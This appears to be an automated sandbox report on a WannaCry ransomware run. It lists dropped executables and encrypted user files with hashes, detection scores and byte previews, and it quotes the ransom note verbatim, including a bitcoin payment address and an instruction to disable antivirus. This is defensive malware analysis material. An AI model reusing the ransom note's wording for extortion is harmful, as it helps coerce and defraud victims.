                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):20480
                                                  Entropy (8bit):3.1664845408760636
                                                  Encrypted:false
                                                  SSDEEP:96:Udocv5e0e1wWtaLYjJN0yDGgI2u9+w5eOIMviS0jPtboyn15EWBwwWwT:6oL0edtJN7qvAZM6S0jP1oynkWBwwWg
                                                  MD5:4FEF5E34143E646DBF9907C4374276F5
                                                  SHA1:47A9AD4125B6BD7C55E4E7DA251E23F089407B8F
                                                  SHA-256:4A468603FDCB7A2EB5770705898CF9EF37AADE532A7964642ECD705A74794B79
                                                  SHA-512:4550DD1787DEB353EBD28363DD2CDCCCA861F6A5D9358120FA6AA23BAA478B2A9EB43CEF5E3F6426F708A0753491710AC05483FAC4A046C26BEC4234122434D5
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 89%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=..y..y..y......x......r......x......}.....z..y..Q..O..x..Richy..........PE..L...W.[J.....................0............... ....@..........................P...............................................!..P....@............................................................................... ...............................text............................... ..`.rdata..z.... ....... ..............@..@.data........0.......0..............@....rsrc........@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\Desktop\taskse.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):20480
                                                  Entropy (8bit):2.5252509618107535
                                                  Encrypted:false
                                                  SSDEEP:96:UjpvOHheaCDCNIOgTegoddPtboyX7cvp0EWy1HlWwr:UjVWEam7ofP1oyX7olWUHlW0
                                                  MD5:8495400F199AC77853C53B5A3F278F3E
                                                  SHA1:BE5D6279874DA315E3080B06083757AAD9B32C23
                                                  SHA-256:2CA2D550E603D74DEDDA03156023135B38DA3630CB014E3D00B1263358C5F00D
                                                  SHA-512:0669C524A295A049FA4629B26F89788B2A74E1840BCDC50E093A0BD40830DD1279C9597937301C0072DB6ECE70ADEE4ACE67C3C8A4FB2DB6DEAFD8F1E887ABE4
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 89%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#O..g.v.g.v.g.v..2x.f.v..1|.l.v..1r.e.v.!+.d.v.g.w...v.Q.}.f.v.Richg.v.........PE..L.....[J.....................0......L........ ....@..........................P..............................................| ..<....@............................................................................... ..`............................text............................... ..`.rdata....... ....... ..............@..@.data........0.......0..............@....rsrc........@.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\Desktop\u.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):245760
                                                  Entropy (8bit):6.278920408390635
                                                  Encrypted:false
                                                  SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                  MD5:7BF2B57F2A205768755C07F238FB32CC
                                                  SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                  SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                  SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\u.wnry, Author: Joe Security
                                                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\u.wnry, Author: ReversingLabs
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\Documents\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\Users\user\Documents\@WanaDecryptor@.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):245760
                                                  Entropy (8bit):6.278920408390635
                                                  Encrypted:false
                                                  SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                  MD5:7BF2B57F2A205768755C07F238FB32CC
                                                  SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                  SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                  SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\Documents\BJZFPPWAPT.png

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.78560332413643
                                                  Encrypted:false
                                                  SSDEEP:24:8ea7PVMFJP6LVt6PhAeT/UadfJ18tXwjIYIV8cdnP:8eRP0AhA6p31AXyIBy8P
                                                  MD5:358CA0F1B146F73378A3CCFB206D888F
                                                  SHA1:D3A403B096E28F4C311A221BF94B15A409A90B9D
                                                  SHA-256:92D6A324736291AB667389F4EA5B99A854D01DCA2699630A58DA1DAC6EFA56A5
                                                  SHA-512:802F0BC3009532180684B58C1DC9E896A537F17FE6D06D1692BD84C7F6538F05048DCC392636BF4FD33452025FBC08929CFD9D468459E464BB64F07A8CE3AA39
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:N....S........*.R.|D<tT>...(.n..b..y.4. .UU].yMI............8....y.sz..<Y..D|..)..|..[......V.......+ ,(e...k......L.Y........ f....x.e.P...y..4(k).N+....w6mHD.z....j.+.9..e..}.....9.5....+.wO.C..i2...`..ld.....7.C...1.).6.Px..'.....l.+c..?.H5.\..h..9..y....3.aj.a..5....~.a.<.B...@.J.\m.z}..h.a...5..........fK..D*.Hl..f.\.8s....`..8<r...l...*..v.z..).?...$...O..<m.C...W..i.A.;Z.._`.... ....DL...H...W..6.-".(.l.....E.l...4 .jh@T.....sw(T....>p8.Lo..8..a.....R.t..."mt.TEG...(.....?...0...NC....w..<.V^..B...*...Hx...........9\.Q1S%.....y......k.8+z...[*.9.f.....ff..!. i..$.u.2..l .a.<.:...Y9.BY.X.h...Z..Q(.q^.."M.......Z..........."..4.......R.#....5^..Q-..V.o....3WMUS.>..#7.s.Y.3..a...&.. .F..@.U.}....`s...K.g"B .....`..@...x.'..%x..9`....42g..A..^..\.}.p.y..T;>....Fz.mj.....CQ.CS.M.Pn+M.7.<G....Nq..rZ.j...$.x?.F..PD}.......y...[.f..,....+..r#.r].d..ph.....".k..$....Y.a....N0...5.z2.8B..>C=...,.8........B%3..o..m..._...H.P..8W...S....V...

                                                  C:\Users\user\Documents\BJZFPPWAPT.png.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.863473346449311
                                                  Encrypted:false
                                                  SSDEEP:24:bkgjFIyEbvezZ3Nkk9Y+/lbMbsV2eFXq1fZahMFCXXmZxJ+Zf:bkgFIyET6Z9kk9YaEFwa1BEMgXXQ+
                                                  MD5:54DA137C9ABD3CD2DE9AE9DAC12088EF
                                                  SHA1:F754E204C4AF7EB7F59A394025685ED84EBB211E
                                                  SHA-256:4EB388D0DE69FEBBA6F8213F1E1619B605312EE85B04857CA0D17899B0F6E91B
                                                  SHA-512:95CA3474C6D1ED14F1FB74CA76C980EE4017F7A71159371764ECD0B7D3AF0B32A909D1372B19ED4C4F6504C8300F1656358A4C246BF103160F2DAA214BE89A85
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!...........C...e...#...H,...@..l.LT..A~;5.36.....p.q..~/.4.IyL..E.+[...X..%..p..F..;.2.c.<Ri....?.Z...hx..r....,M.q. ..+..e p..^.vV1.4f.."e..G.c...R..G.k....G.P.X:..qs.`s..1.^......(.].N.=.........j&..K...Wj..cEb.<..n.p......k8..FN...#...s....u..............[.+....[.]p./.\...sZ.x~C.g.Gq....G....x....Jp..7.U.I>........I...5....>-g..K.V..B0..R.G.{i.zQ.....i....>@3|...W-4..5...*7..1B....Uh.D..F]..V.S...`.....)2...Iifj..RU.....G...2.%K.XT.....YI.A.Hsy;K.)dqu^ .}[....v4.....85...Vj.......'e....m..".6....M..m.....-0.N.PH.9..'..>.i*.Yh..#...>.q.+.2...`|..|4.`i5..- ....T......Y}(.a......s..2:-$.1...^Q_a...?.j.9..F....0.+...8.xYxK..n.A.a...3.5...c.kkp;.X]......U.....S....n........{...8...p..j0...7@Sw..ID...HK.o.....L~...<...:l.^7H.p....hk....|..7..*I3.'....$..Q.B.n...u...pN.b.w .z.'.Z..@.Q..&..................|3.............N...$V..........s...j..X..{7eh...x..7.&d..G..'.u.o..R..!.8.-.^^.K...l..dq...(a.[....9m....}P..T..D.,..e..(....V.z.....

                                                  C:\Users\user\Documents\BJZFPPWAPT.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.863473346449311
                                                  Encrypted:false
                                                  SSDEEP:24:bkgjFIyEbvezZ3Nkk9Y+/lbMbsV2eFXq1fZahMFCXXmZxJ+Zf:bkgFIyET6Z9kk9YaEFwa1BEMgXXQ+
                                                  MD5:54DA137C9ABD3CD2DE9AE9DAC12088EF
                                                  SHA1:F754E204C4AF7EB7F59A394025685ED84EBB211E
                                                  SHA-256:4EB388D0DE69FEBBA6F8213F1E1619B605312EE85B04857CA0D17899B0F6E91B
                                                  SHA-512:95CA3474C6D1ED14F1FB74CA76C980EE4017F7A71159371764ECD0B7D3AF0B32A909D1372B19ED4C4F6504C8300F1656358A4C246BF103160F2DAA214BE89A85
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!...........C...e...#...H,...@..l.LT..A~;5.36.....p.q..~/.4.IyL..E.+[...X..%..p..F..;.2.c.<Ri....?.Z...hx..r....,M.q. ..+..e p..^.vV1.4f.."e..G.c...R..G.k....G.P.X:..qs.`s..1.^......(.].N.=.........j&..K...Wj..cEb.<..n.p......k8..FN...#...s....u..............[.+....[.]p./.\...sZ.x~C.g.Gq....G....x....Jp..7.U.I>........I...5....>-g..K.V..B0..R.G.{i.zQ.....i....>@3|...W-4..5...*7..1B....Uh.D..F]..V.S...`.....)2...Iifj..RU.....G...2.%K.XT.....YI.A.Hsy;K.)dqu^ .}[....v4.....85...Vj.......'e....m..".6....M..m.....-0.N.PH.9..'..>.i*.Yh..#...>.q.+.2...`|..|4.`i5..- ....T......Y}(.a......s..2:-$.1...^Q_a...?.j.9..F....0.+...8.xYxK..n.A.a...3.5...c.kkp;.X]......U.....S....n........{...8...p..j0...7@Sw..ID...HK.o.....L~...<...:l.^7H.p....hk....|..7..*I3.'....$..Q.B.n...u...pN.b.w .z.'.Z..@.Q..&..................|3.............N...$V..........s...j..X..{7eh...x..7.&d..G..'.u.o..R..!.8.-.^^.K...l..dq...(a.[....9m....}P..T..D.,..e..(....V.z.....

                                                  C:\Users\user\Documents\BNAGMGSPLO.pdf

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.8068780345827244
                                                  Encrypted:false
                                                  SSDEEP:24:5wI9UP0PdqtSytQ3QLid1u0j8ld5+lh08/t0Ea+X5ucPA/W+6:mCdSSAMUid1u0gld5+bZFBucPYW+6
                                                  MD5:91B16A12E5C2A9061BDDC8BE74720ABE
                                                  SHA1:2FF8B4637DA343CC36CC9E3D8AE65D07B85C423D
                                                  SHA-256:0CD26F9AA88943711EAA14C81EB8C747E6E9881D617DCAFC1CFFE79F1FDBA662
                                                  SHA-512:CF4873FF27B1155A0472D9067DC20F346F111FD7794C3D6A034AE13F1AE25F30243B0EBC8AC80C6C31A5BDFF1A5E5EB0615F083E6039EA6B6307922E42C01433
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..=....y.`;.~....-..e..F..C....vgi..6 1i..!...<..].....<......J....4Yv^.%Kh......C.b.-...}.&R2.@....)4>...d*AiVI...3$>l<.)h8..B....8p...*..........P..7x..\ ......g.. .v[\$..pC}v...Y.n..b.q...t.$........N..&!.R....2.q.L..jWG..R...b._..lu=.~...6.......)i....5...L...pP..*..../`...?y...I...^.9o).s.d..D..(.*..w{...u..v\Q..-......~Y....v....m.. ...._.v...[..o.g......m..!...........G>....v.....t.............>...*..@....1u..xj.UuE.:E.1W...U.^..-...Acqv6..W0K.....m...S{..C....8.z..a..i!m..:c..Lr../.3.Q..n.lnx.-...k.3]2...E.U;.l.C...p.k.#s...E*=.....#!.......8...&c.....r.>..i0..o.+=>G.>..2........".....~.f...#.........n.)?...~.....~@....=O....B.6.}.Y.._1.3FI9..Vq..3...1b.3....Z.. ...9.|.N..k....D..VQ.E.O.h..C.~k.....s.V........&.dX*$.M....8?.^#M...3..s...H9cE`Z0.F...=G./...f3`....q..NXjY....4..gn.T'?@5[...VP.;.b.U..N.2f..T..m(.Q...Tx.=J..]KaJK...X.U....c.....3...(..J....GG.?..m.l*..>.yIV.9.........wb....u..v...Y...A4lT.-6=.1..'.P_)...b.e..U.m...2|'

                                                  C:\Users\user\Documents\BNAGMGSPLO.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.827553224766407
                                                  Encrypted:false
                                                  SSDEEP:24:bkIxRDtbbOspmRGrhkv34k7AsXSd9q9DLZ6oMy5N6E8muaj+261eNNPj:bkI7tbbv2GrcIkHXSd9q9JZ558DW61Cb
                                                  MD5:99EB7AFC07CCA9594CC1A1AB2A301DD0
                                                  SHA1:B2174A332D8AACE16958CD648046A842768CBA33
                                                  SHA-256:74DFC07F7E540EC8B4137AF6C16E7D526FF4D91C6D6274A845A56D3CAD337696
                                                  SHA-512:13419D9481FA051CF4E1E0568455B669E21E09B4B3820DCDE0B2E64E29FFACE0710447C5918697654B2EA4736D69A9C230A1210D2BD5678BCEAECB26647ABA29
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....Q..&.UZ......'.b..IE<j_/.N.rG.Q...J:..Y......x.NA...r[.|...F;........{..{.U.(....b.....;...D........_}.&.. ...K.{.ug7.+.+b.wK6..4..+..m.9;......F.......?T..D.K@%(m..5...X.6~.^.....\....p.Z.*3Q..\{ev.....d.r>...:B.i5..#.\.w.&Xt.....).K..aU...x.,3............9[..]....wO.g.H..1g.P..O]...(.(s..i.c.|JD........:..H....~q..y.aa.Dl".;.Hl~..G!.~-..03b..n..y...0.|.q..Ca.>.f...5.h..H.....1.d.4....8...p.IXb=.rK-..yt(..y.Y/T....r..iC=..{.s\..7.O>..I.jU..Xu...DW...{....y+P..{qC..C.....f.}..R....e.....@f.7q.>{...5o......._~*.x....Bsh..q.]..^........7.<....B.R......!.&............6...).....r....`R....a!:E.vw.]n\....7,..+..........,.<..-.3.....F...,[.h.....p.\7h=H..t......`...,{I.).....i|../..]\..D/S.!Z.....+.....t.....`.....,J...])..Kx...%.....u..-..g.F..c..:.k...F...r...0w.A...j..hZT..^..........7......WG>....k..>1....4:w..L.$g..7+..^.....3.5.J......,.x......iW.9X....X.N..D..H.....7..3......a...3.g..z`...3.@6?...#.x&t.f.O...k_.o. ....

                                                  C:\Users\user\Documents\BNAGMGSPLO.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.827553224766407
                                                  Encrypted:false
                                                  SSDEEP:24:bkIxRDtbbOspmRGrhkv34k7AsXSd9q9DLZ6oMy5N6E8muaj+261eNNPj:bkI7tbbv2GrcIkHXSd9q9JZ558DW61Cb
                                                  MD5:99EB7AFC07CCA9594CC1A1AB2A301DD0
                                                  SHA1:B2174A332D8AACE16958CD648046A842768CBA33
                                                  SHA-256:74DFC07F7E540EC8B4137AF6C16E7D526FF4D91C6D6274A845A56D3CAD337696
                                                  SHA-512:13419D9481FA051CF4E1E0568455B669E21E09B4B3820DCDE0B2E64E29FFACE0710447C5918697654B2EA4736D69A9C230A1210D2BD5678BCEAECB26647ABA29
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....Q..&.UZ......'.b..IE<j_/.N.rG.Q...J:..Y......x.NA...r[.|...F;........{..{.U.(....b.....;...D........_}.&.. ...K.{.ug7.+.+b.wK6..4..+..m.9;......F.......?T..D.K@%(m..5...X.6~.^.....\....p.Z.*3Q..\{ev.....d.r>...:B.i5..#.\.w.&Xt.....).K..aU...x.,3............9[..]....wO.g.H..1g.P..O]...(.(s..i.c.|JD........:..H....~q..y.aa.Dl".;.Hl~..G!.~-..03b..n..y...0.|.q..Ca.>.f...5.h..H.....1.d.4....8...p.IXb=.rK-..yt(..y.Y/T....r..iC=..{.s\..7.O>..I.jU..Xu...DW...{....y+P..{qC..C.....f.}..R....e.....@f.7q.>{...5o......._~*.x....Bsh..q.]..^........7.<....B.R......!.&............6...).....r....`R....a!:E.vw.]n\....7,..+..........,.<..-.3.....F...,[.h.....p.\7h=H..t......`...,{I.).....i|../..]\..D/S.!Z.....+.....t.....`.....,J...])..Kx...%.....u..-..g.F..c..:.k...F...r...0w.A...j..hZT..^..........7......WG>....k..>1....4:w..L.$g..7+..^.....3.5.J......,.x......iW.9X....X.N..D..H.....7..3......a...3.g..z`...3.@6?...#.x&t.f.O...k_.o. ....

                                                  C:\Users\user\Documents\EOWRVPQCCS.mp3

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.812360612444189
                                                  Encrypted:false
                                                  SSDEEP:24:ysAELyPGiAYTulvoJtwMOTHBuCufS/b8l5:ysAYPiAYTovutwM+0CufS/Yl5
                                                  MD5:F39F139E4AE90FEB41D371FEB063A165
                                                  SHA1:03B8A5414E6E35DFEE373CF5B66B4ADF229208B6
                                                  SHA-256:520E715124CEA418595B0B0C061286A84915497322DE5868B975FA3A8528737F
                                                  SHA-512:5A7B5367E74BA92F1F0959ED1BDA531AAD9657028465CE5D2061F5CA07EFC36C5CA81633D0DD3B6ABEDFE459B52385EA7A73A4A895977794ABFE0662FFEE41F1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:3..BK..ijtYy..'7.gm.L.K.Z...O...4.`B...-.....V.S.K9'^M]...n...........a]&.O..^.......8.s.....S.,.C.....{.a..."S...e4..]h....#....T...e%..kfM- ...kl<.S...$Fq.R.o...sGX3.RO..,Z.Ou..3..9P[...o.*.$;.*.g.C..3../,a.#..y.yk&3t..=...C.rx..s>ob[3h..]..F.Vj^.....M...U.I.AM...=...$.[..2..P.P../..q...>S..b...P.N..[....)......o%...-.hp%.;.U..at..9..;...[paZS.$...o..W..g<k...I..."zg..'.....C...Q6...$..f....R.i.$@..gq....t../%...j.o..d*...E._..,.....OB6.......w.V.../7....K..Q9.._{n...;...N..).f.(..Y...[.l.^.!..K-.O....>|..?..$F.'..`...$Fy%$..z.......#.......N..b_G.Ye....2."u_......O...O..E....{........9"..,\Rr<..@.....W..I...c....D|...{G$&F..,._7F..${T...m.L@%(@.......>.d...........X../.....f..y.T..'.T......@..).1....W%........M&...e...Fq...`#iV..V2....vy....X.v...Y.h....7l!....gG<4.8z....g..d..e.m .X.2.$....+....}..........,......@-....*.]j..b^.O.......7...pC..}.>...Ql1.{L..l.!kMuY....>.=.Va..B..6.s.FU.....pg.....\.q.N.&w.|0.?}....@1........Ej.$].\..

                                                  C:\Users\user\Documents\EOWRVPQCCS.mp3.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.854983293082593
                                                  Encrypted:false
                                                  SSDEEP:24:bkxqzQ4FOYF68Wa3kkUEPZiD8g0dcCpt5kMtkIMOY8gQ8CoZLSZ+lhmizquJqKWW:bkxQ6YF68lUkUQiT0dcCbaMtPgbCohSc
                                                  MD5:3BC3E0DEB56C3CF26AD9E25E45388211
                                                  SHA1:B91480215B0F3A028CEEF91A4A46631958B5BFD6
                                                  SHA-256:EE8D2F436B98D25C937D6033CFC4824F6A5B51ECC3A0F571EF39861512974E3C
                                                  SHA-512:8608BFDB0F6ECB8B1753AB8BED481DC151EBAEF7CEF1DC4E2C82AD938756315F3E2112159FD2B344FC417213B42BCD10F3179C66CF00035114F0C8090A0A6CE2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....O..e...1.z=..h0H2?.j..-..]F...t +:A"Ci..[.."...C~IzR...N.................X..u03.6.O.L.8....M.1...&.-=...|....D.<#....*..B.$.M7L....W.C7.;-..lw.Q9...DlW6wS@chW.Q.fR.5.yj5VJ...%.?.........x......6..b...]...x...\...F....SH].,.C.....^.q.7!Q=.....q.................yHh$..........a.#.^.I..R.....Lw...h.bE....daxm..m.....sP'Vjl....2..x.T.!.g.K)<..9f.....v.P..9.]....2.?...V.B.....Q..N.8.G...0..s.u....s..!]...G3V.....#.h.'./.B.$..H.,... .S.E4A...2..7.4.U<...^PH....]..Z....Su..M......V..m...Tw..C.81.q.X......a.......>Tn|.4sXs..5....9.....c....v..l.P?.qCPK.........Wdi.b.$)^.{..P.c.t.e.&r../...g5.]6..F..n.J...,u.%...!......~...C..S...0.&e.'.y.#WT.E..>...-A/..Ei...v.e3.a...!w"M.B........_.....LS....2..8....2.E..~.\{.~..F.'cur..,m.G...0.. .i..7'.....B....u["......a...s.....2R=24.M.a..K..K.(..H.?...{.$.f&S..g.4 ..I..I.........M.m...X.0.*....f......0....._....r/8X.n-w.g.......v.......9.C....,.o..=e+...6.,.../D.= ..o...,..7......)SI.w..a.e.].&g.

                                                  C:\Users\user\Documents\EOWRVPQCCS.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.854983293082593
                                                  Encrypted:false
                                                  SSDEEP:24:bkxqzQ4FOYF68Wa3kkUEPZiD8g0dcCpt5kMtkIMOY8gQ8CoZLSZ+lhmizquJqKWW:bkxQ6YF68lUkUQiT0dcCbaMtPgbCohSc
                                                  MD5:3BC3E0DEB56C3CF26AD9E25E45388211
                                                  SHA1:B91480215B0F3A028CEEF91A4A46631958B5BFD6
                                                  SHA-256:EE8D2F436B98D25C937D6033CFC4824F6A5B51ECC3A0F571EF39861512974E3C
                                                  SHA-512:8608BFDB0F6ECB8B1753AB8BED481DC151EBAEF7CEF1DC4E2C82AD938756315F3E2112159FD2B344FC417213B42BCD10F3179C66CF00035114F0C8090A0A6CE2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....O..e...1.z=..h0H2?.j..-..]F...t +:A"Ci..[.."...C~IzR...N.................X..u03.6.O.L.8....M.1...&.-=...|....D.<#....*..B.$.M7L....W.C7.;-..lw.Q9...DlW6wS@chW.Q.fR.5.yj5VJ...%.?.........x......6..b...]...x...\...F....SH].,.C.....^.q.7!Q=.....q.................yHh$..........a.#.^.I..R.....Lw...h.bE....daxm..m.....sP'Vjl....2..x.T.!.g.K)<..9f.....v.P..9.]....2.?...V.B.....Q..N.8.G...0..s.u....s..!]...G3V.....#.h.'./.B.$..H.,... .S.E4A...2..7.4.U<...^PH....]..Z....Su..M......V..m...Tw..C.81.q.X......a.......>Tn|.4sXs..5....9.....c....v..l.P?.qCPK.........Wdi.b.$)^.{..P.c.t.e.&r../...g5.]6..F..n.J...,u.%...!......~...C..S...0.&e.'.y.#WT.E..>...-A/..Ei...v.e3.a...!w"M.B........_.....LS....2..8....2.E..~.\{.~..F.'cur..,m.G...0.. .i..7'.....B....u["......a...s.....2R=24.M.a..K..K.(..H.?...{.$.f&S..g.4 ..I..I.........M.m...X.0.*....f......0....._....r/8X.n-w.g.......v.......9.C....,.o..=e+...6.,.../D.= ..o...,..7......)SI.w..a.e.].&g.

                                                  C:\Users\user\Documents\GAOBCVIQIJ.docx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.802056296456517
                                                  Encrypted:false
                                                  SSDEEP:24:+kUaPHVl7d2dFm8L8uJLJ0C/QmoL1cB3JgfIdLEsJUgAw:7FPTd2Pm8L/F6qQjcrXLHf
                                                  MD5:E0CB323321AD80AA32657B7049955BF9
                                                  SHA1:237E81047F8114B831ACC7742602E48AD6B8EBB3
                                                  SHA-256:84020FF7F711136C61D7E8881F03819E6BDF6DF4C902B3F77003196AE8D6750F
                                                  SHA-512:18272A555A93BA03010974D17B0499D5422A464439BF30767BFB0366A46D3C32E7DC9AB243841D3A0D94F46E78D2A22B2A7D1E9BE84B92B194AB940292BCBEEE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.y....%U`8e..<^MYzO4.J.......E..".xF".....'i./......?..V.=_.L;X.q.-..TS..P..].Z7...u...0.$...D.j.....T...@.J[..#...:9.Z..c.\.......7-.....t.../S...~\...<..B.SY.u.mO...s.....w...},.m0..$?..E...[U....#...[....K.0..wP>.T...-4.]a....%,.E...[...>d...Zzk10..'Pg.:.....?.[....!.Sw.#.l.wwp..i.+&.........X_..E.}.J.e...L...Q.....r.K.5C....w.w......_)1n-..e...%.1.Sk-....I(5y...S..c...o.p..D..W....t...'.ql..9..u...Y.J2.g!....@.....r...].......%...q.R.......1M.a}p.id8..H\.s......(..R.....P..1.8.p_.N.X.?.....)O.:r.s.$...:.....W.o....#.wn..u....9.mt.s.T{..r!`.W....m..Iie.2#.yJ.........Z..F.J..3.V.f..AM......|{.z...L...W.0.x......~m.6i.08....YbD....Y.6...1j..;.7..jDt...1w.8ze....>E........v..4.h.Cm..C../..(6.Eb..Y.Yy.-...i}..b...P..>;....k.#{$._z.*.aW.^..I@..C...B.g..M.._9.zx..{mV...#..X.......XRK......[.6.0.......+..yLX*..`p+.n.vC<.....z.(..U..S).....-.......'0...Y.b=T:....1A...j...."...1......0.>....gG....w...F|f.s:.....6.]..G..Fb..q.1........MbL...

                                                  C:\Users\user\Documents\GAOBCVIQIJ.docx.WNCRY (copy)

                                                  Download File
